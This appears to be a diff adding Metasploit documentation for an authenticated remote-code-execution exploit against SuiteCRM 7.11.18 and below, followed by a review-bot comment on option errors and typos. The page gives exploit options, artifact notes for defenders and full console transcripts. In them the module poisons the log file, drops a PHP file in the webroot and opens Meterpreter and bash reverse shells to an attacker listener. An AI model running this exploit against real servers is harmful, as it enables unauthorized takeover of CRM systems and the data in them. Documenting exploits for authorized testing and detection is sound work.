|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +SuiteCRM versions 7.11.18 and below. https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_18 |
| 4 | + |
| 5 | +### Installation |
| 6 | +Installation: https://docs.suitecrm.com/admin/installation-guide/downloading-installing/ |
| 7 | + |
| 8 | +The fastest way to stand up a quick test instance is with docker. Bitnami hosts docker images and `docker-compose.yml` files. |
| 9 | + |
| 10 | +Docker installation: https://docs.docker.com/get-docker/ |
| 11 | + |
| 12 | +``` |
| 13 | +curl -sSL https://raw.githubusercontent.com/bitnami/bitnami-docker-suitecrm/master/docker-compose.yml > docker-compose.yml |
| 14 | +docker-compose up -d |
| 15 | +``` |
| 16 | + |
| 17 | +You'll just want to edit the docker-compose file to pull the 7.11.18 release before you run `docker-compose up -d`. Example `docker-compose.yml` below: |
| 18 | + |
| 19 | +``` |
| 20 | + suitecrm: |
| 21 | + image: docker.io/bitnami/suitecrm:7.11.18 |
| 22 | +``` |
| 23 | + |
| 24 | +## Verification Steps |
| 25 | +Example steps in this format (is also in the PR): |
| 26 | + |
| 27 | +1. Install the application |
| 28 | +2. Start msfconsole |
| 29 | +3. Do: `use exploit/linux/http/suitecrm_log_file_rce` |
| 30 | +4. Do: `set USER [username]` |
| 31 | +5. Do: `set PASS [password]` |
| 32 | +6. Do: `set RHOSTS [IP]` |
| 33 | +7. Do: `set SRVPORT [IP]` |
| 34 | +8. Do: `set LHOST [IP] ` |
| 35 | +9. Do: `exploit` |
| 36 | +10. You should get a shell. |
| 37 | + |
| 38 | +## Options |
| 39 | +### USER |
| 40 | +Username of a user with administrator access to the SuiteCRM instance |
| 41 | + |
| 42 | +### PASS |
| 43 | +Password of the user with administrator access to the SuiteCRM instance |
| 44 | + |
| 45 | +### TARGETURI |
| 46 | +The base path to SuiteCRM. The default is `/` |
| 47 | + |
| 48 | +### RESTORECONF |
| 49 | +Restore the system log file settings to the default value of `suitecrm.log`. Default value is `true` |
| 50 | + |
| 51 | +### LASTNAME |
| 52 | +Last name you'd like to set the admin user back to after running the exploit. Default is `admin`. |
| 53 | + |
| 54 | +### WRITABLEDIR |
| 55 | +Any writable directory for paylod to be written. Only used for targets `0` ( `x64 meterpreter` ) and `2` ( `x86 meterpreter` ) |
| 56 | + |
| 57 | +## Targets |
| 58 | +Default is `0` with a payload of `linux/x64/meterpreter_reverse_tcp` |
| 59 | +``` |
| 60 | +Exploit targets: |
| 61 | +
|
| 62 | + Id Name |
| 63 | + -- ---- |
| 64 | + 0 Linux (x64) |
| 65 | + 1 Linux (cmd) |
| 66 | +``` |
| 67 | +Currently, this supports |
| 68 | +* `linux/x64/meterpreter_reverse_tcp` |
| 69 | +* `cmd/unix/bash_reverse_tcp` |
| 70 | + |
| 71 | +There is some encoding/escaping on the php poisoning into the log file, so php code is limited. I would also presume an `x86` meterpreter would run fine, but I haven't tested it. I did test a `cmd/unix/bash_reverse_udp` and it worked fine. I would presume most `cmd` payloads will work contingent on the required tools being available on the victim machine. |
| 72 | + |
| 73 | +### Artifacts/IOC's |
| 74 | +Target 0 is going to leave a random, 8 character alphanumeric PHP file such as this |
| 75 | +``` |
| 76 | +ryl2bLse.pHp |
| 77 | +``` |
| 78 | +in the webroot and it will leave a random alphanumeric 8 character file in `WRITABLEDIR` (`/tmp` by default) similar to this |
| 79 | +``` |
| 80 | +uG0QjRbK |
| 81 | +``` |
| 82 | +Operators: keep an eye out for the last couple of lines of output |
| 83 | +``` |
| 84 | +[!] This exploit may require manual cleanup of 'eTHsm71W.pHp' on the target |
| 85 | +[!] This exploit may require manual cleanup of '/tmp/54N6HA1E' on the target |
| 86 | +``` |
| 87 | + |
| 88 | +## Scenarios |
| 89 | +### SuiteCRM 7.11.18 Check + Target 0 (linux x64 meterpreter) |
| 90 | +``` |
| 91 | +msf6 > use exploit/linux/http/suitecrm_log_file_rce |
| 92 | +[*] Using configured payload linux/x64/meterpreter_reverse_tcp |
| 93 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29 |
| 94 | +RHOSTS => 192.168.122.29 |
| 95 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin |
| 96 | +USER => admin |
| 97 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin |
| 98 | +PASS => admin |
| 99 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125 |
| 100 | +SRVHOST => 192.168.122.125 |
| 101 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125 |
| 102 | +LHOST => 192.168.122.125 |
| 103 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > check |
| 104 | +
|
| 105 | +[*] Authenticating as admin |
| 106 | +[+] Authenticated as: admin |
| 107 | +[+] admin has administrative rights. |
| 108 | +[+] SuiteCRM Version 7.11.18 |
| 109 | +[*] 192.168.122.29:80 - The target appears to be vulnerable. |
| 110 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit |
| 111 | +
|
| 112 | +[*] Started reverse TCP handler on 192.168.122.125:4444 |
| 113 | +[*] Using URL: http://192.168.122.125:8080/NzzKmKY |
| 114 | +[*] Authenticating as admin |
| 115 | +[+] Authenticated as: admin |
| 116 | +[+] admin has administrative rights. |
| 117 | +[*] Modifying systems setting file |
| 118 | +[*] Poisoning log file |
| 119 | +[*] Executing php code in log file: fxg8pi1C.pHp |
| 120 | +[+] 192.168.122.29:80 - Payload sent! |
| 121 | +[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500 |
| 122 | +[*] Restoring log file to default configuration |
| 123 | +[*] Server stopped. |
| 124 | +[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target |
| 125 | +[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target |
| 126 | +
|
| 127 | +meterpreter > getuid |
| 128 | +Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1) |
| 129 | +meterpreter > exit |
| 130 | +[*] Shutting down Meterpreter... |
| 131 | +
|
| 132 | +[*] 172.21.0.3 - Meterpreter session 1 closed. Reason: User exit |
| 133 | +``` |
| 134 | +### SuiteCRM 7.11.18 Check + Target 1 (Unix bash reverse TCP shell) |
| 135 | +This was run immediately after the previous scenario. Initialization is exactly the same. |
| 136 | +``` |
| 137 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i |
| 138 | +
|
| 139 | +Active sessions |
| 140 | +=============== |
| 141 | +
|
| 142 | +No active sessions. |
| 143 | +
|
| 144 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1 |
| 145 | +target => 1 |
| 146 | +msf6 exploit(linux/http/suitecrm_log_file_rce) > run |
| 147 | +
|
| 148 | +[*] Started reverse TCP handler on 192.168.122.125:4444 |
| 149 | +[*] Using URL: http://192.168.122.125:8080/Kle8QoPV |
| 150 | +[*] Authenticating as admin |
| 151 | +[+] Authenticated as: admin |
| 152 | +[+] admin has administrative rights. |
| 153 | +[*] Modifying systems setting file |
| 154 | +[*] Poisoning log file |
| 155 | +[*] Executing php code in log file: 1cOyYGE3.pHp |
| 156 | +[+] 192.168.122.29:80 - Payload sent! |
| 157 | +[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500 |
| 158 | +[*] Restoring log file to default configuration |
| 159 | +[*] Server stopped. |
| 160 | +[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target |
| 161 | +
|
| 162 | +id |
| 163 | +uid=1(daemon) gid=1(daemon) groups=1(daemon) |
| 164 | +whoami |
| 165 | +daemon |
| 166 | +exit |
| 167 | +[*] 192.168.122.29 - Command shell session 2 closed. |
| 168 | +
|
| 169 | +``` |
| 170 | + |
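Review bot: Verification step 7, `set SRVPORT [IP]`, names the wrong option: SRVPORT takes a port number, and the scenario transcript below sets `set SRVHOST 192.168.122.125` instead, so the step should read `set SRVHOST [IP]` (and the trailing space in step 8's `set LHOST [IP] ` should go). The WRITABLEDIR description also refers to target `2` (`x86 meterpreter`), but the Targets block lists only `0 Linux (x64)` and `1 Linux (cmd)`; either drop the reference to target 2 or state that it is not implemented yet. Minor wording: "paylod" in the WRITABLEDIR option and "Artifacts/IOC's" (should be "Artifacts/IOCs").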